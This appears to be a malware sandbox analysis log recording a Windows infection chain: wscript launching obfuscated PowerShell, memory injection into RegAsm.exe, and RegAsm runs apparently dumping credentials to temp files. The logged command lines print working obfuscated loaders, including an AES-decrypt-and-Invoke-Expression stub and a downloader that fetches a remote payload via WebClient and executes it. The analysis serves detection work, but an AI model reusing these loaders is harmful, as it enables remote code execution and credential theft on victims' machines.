                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B08008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 4_2_004120F7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00419627 mouse_event,4_2_00419627
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem" (2 identical entries)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jmlaun"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\tgqsvxbzg"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). 
');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). 
');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni98685860701936162316809131591218cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'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cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crep
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). 
');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). 
');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni98685860701936162316809131591218cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'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cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crep
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). 
');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ 